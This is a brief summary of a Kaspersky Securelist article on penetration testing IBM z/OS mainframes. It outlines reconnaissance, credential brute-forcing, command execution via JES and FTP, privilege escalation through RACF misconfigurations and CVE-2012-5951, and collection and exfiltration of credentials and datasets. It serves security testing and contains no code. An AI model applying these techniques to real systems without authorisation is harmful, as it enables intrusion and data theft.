Approach to mainframe penetration testing on z/OS>
Secure List by Kaspersky – Denis Stepanov, Alexander Korotin
The article provides an in-depth overview of mainframe pentesting, focusing on IBM mainframes running the z/OS operating system with the Resource Access Control Facility (RACF) security package
It covers the entire pentesting process, from reconnaissance to data exfiltration, and highlights the unique aspects of mainframe systems compared to more common environments
Key points:
1) Reconnaissance: Identifying a mainframe through network scanning, service banner analysis, and user enumeration via the Telnet service.
2) Initial access: Exploiting weak passwords, default credentials, or password brute-forcing
Executing commands through the Job Entry System (JES) and FTP server, Network Job Entry (NJE), Virtual Telecommunications Access Method (VTAM), or standard services like Telnet and SSH.
3) Privilege escalation: Abusing misconfigurations in dataset access control, such as the Authorized Program Facility (APF), WARNING mode, and resource class access control (TSOAUTH, OPERCMDS, FACILITY, SURROGAT)
Exploiting vulnerabilities in UNIX System Services (USS), like CVE-2012-5951.
4) Collection: Gathering sensitive information from USS files, such as command histories, configuration files for various services (Kerberos, LDAP, IBM HTTP Server, WebSphere), and encrypted credentials.
5) Exfiltration: Using standard protocols (FTP, SSH) and their utilities, the x3270 utility, or copying files to HTTP server directories
Transferring datasets to USS files for exfiltration
The article emphasizes the importance of understanding mainframe-specific concepts, such as dataset types, resource classes, and the EBCDIC character encoding
It also provides links to various tools and scripts that can aid in the pentesting process
The author concludes by noting that the techniques and procedures discussed are not exhaustive and encourages readers to contribute to this relatively niche field of mainframe pentesting
The article serves as a starting point for those interested in exploring the security of these complex systems.
Link: https://securelist.com/zos-mainframe-pentesting/113427/